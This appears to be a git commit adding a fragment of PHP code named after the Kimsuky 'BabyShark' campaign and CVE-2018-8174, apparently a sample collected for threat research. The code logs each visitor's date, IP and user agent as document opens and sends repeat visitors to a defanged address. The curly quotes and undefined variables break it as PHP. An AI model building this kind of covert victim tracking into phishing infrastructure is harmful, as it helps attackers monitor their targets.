Create babyshark-CVE20188174.php
This commit is contained in:
29
baby-kimsuky/babyshark-CVE20188174.php
Normal file
29
baby-kimsuky/babyshark-CVE20188174.php
Normal file
@@ -0,0 +1,29 @@
|
|||||||
|
if(file_exists($filename))
|
||||||
|
|
||||||
|
{
|
||||||
|
|
||||||
|
if($ff=fopen(“resp”,”a”))
|
||||||
|
|
||||||
|
{
|
||||||
|
|
||||||
|
fwrite($ff, $date . ” ” . $ip . ” “.$useragent.” reopen document.” .”\r\n”);
|
||||||
|
|
||||||
|
fclose($ff);
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
header(“location: http://google[.]com”);
|
||||||
|
|
||||||
|
exit;
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
if($ff=fopen(“resp”,”a”))
|
||||||
|
|
||||||
|
{
|
||||||
|
|
||||||
|
fwrite($ff, $date . ” ” . $ip . ” “.$useragent.” open document.” .”\r\n”);
|
||||||
|
|
||||||
|
fclose($ff);
|
||||||
|
|
||||||
|
}
|
||||||
Reference in New Issue
Block a user